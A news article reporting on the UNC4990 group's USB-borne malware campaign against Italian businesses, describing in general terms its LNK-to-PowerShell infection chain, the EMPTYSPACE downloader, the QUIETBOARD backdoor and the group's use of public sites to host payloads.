UNC4990 uses weaponised USBs to attack Italian businesses

Italian businesses face a surge of cyber threats executed by the financially motivated threat group UNC4990.

Based on reports, the campaign uses weaponised USB devices that act as Trojan horses to infiltrate organisations across various Italian sectors, such as health, transportation, construction, and logistics.

The threat group’s strategy revolves around a two-pronged attack – widespread USB infection and subsequent deployment of the EMPTYSPACE downloader. In addition, UNC4990 leverages third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded additional stages of the malware. This sophisticated approach aims to bypass detection since these seemingly harmless platforms disguise the malicious activities.

 

UNC4990 has compromised Italian organisations since 2020.

 

UNC4990 has left a digital footprint pointing to its base of operations in Italy since late 2020 since they have extensively used the Italian infrastructure for command-and-control (C2) purposes.

The ultimate objectives of UNC4990 remain a mystery as researchers cannot definitively classify whether the group functions solely as an initial access facilitator for other threat actors or has an independent cybercriminal operation.

In one particular instance, an open-source cryptocurrency miner emerged following months of beaconing activity, adding a layer of complexity to UNC4990’s motives.

Furthermore, the infection starts harmlessly enough when a victim unwittingly opens a malicious LNK shortcut file on a removable USB device, triggering the execution of a PowerShell script responsible for downloading EMPTYSPACE from a remote server.

On the other hand, a separate investigation identified four distinct variants of EMPTYSPACE written in Golang, .NET, Node.js, and Python. These variants act as channels for fetching next-stage payloads, including a Python-based backdoor named QUIETBOARD, from the C2 server.

Fortunately, the content hosted on the earlier platforms posed no direct risk to regular users, as the malicious elements were isolated from harmless content.

This modular approach showcases UNC4990’s inclination for experimentation and adaptability, employing multiple programming languages to create different versions of the EMPTYSPACE downloader and dynamically changing URLs to avoid takedowns.

As Italian businesses deal with this cyber threat, the UNC4990 campaign is a reminder that the attackers continue to evolve to execute a more sophisticated operation. Therefore, companies and users should know more about these threats to thwart such malicious campaigns.